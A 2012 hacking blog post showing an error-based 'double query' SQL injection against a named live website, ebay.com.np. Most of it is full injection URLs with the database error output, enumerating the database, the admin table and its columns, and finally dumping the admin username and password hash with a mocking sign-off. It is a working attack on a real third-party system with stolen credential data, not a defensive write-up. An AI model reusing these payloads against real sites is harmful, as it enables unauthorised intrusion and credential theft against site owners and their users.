Home » Hacking » tutor » SQL Injection Double Query in @http://www.ebay.com.np/

Minggu, 06 Mei 2012

SQL Injection Double Query in @http://www.ebay.com.np/

SQL Injection Double Query in @http://www.ebay.com.np/ 
Author : jincorn
Vuln : Húsnáín Párvéz

http://www.ebay.com.np/index.php?task=cms&id=3%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(database()%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)


Duplicate entry 'ebaycom_ebay~1' for key 1 in



http://www.ebay.com.np/index.php?task=cms&id=3%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)


Duplicate entry 'admin~1' for key 1 in



http://www.ebay.com.np/index.php?task=cms&id=3%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x61646d696e%20limit%202,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)


Duplicate entry 'password~1' for key 1 in



http://www.ebay.com.np/index.php?task=cms&id=3%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x61646d696e%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)


Duplicate entry 'username~1' for key 1 in



http://www.ebay.com.np/index.php?task=cms&id=3%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(username,0x7e,password)%20as%20char),0x7e))%20from%20admin%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)


Duplicate entry 'admin~OqzuSFheeuq1KVEPPCnyJPF_IwRfCV0jthfv9NZZSDk~1' for key 1 in


Enjoy it if you can decrypt the pass lol ;)

SQL Injection Double Query in @http://www.ebay.com.np/ Rating: 4.5 Diposkan Oleh: r007-

Artikel Terkait SQL Injection Double Query in @http://www.ebay.com.np/ :

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)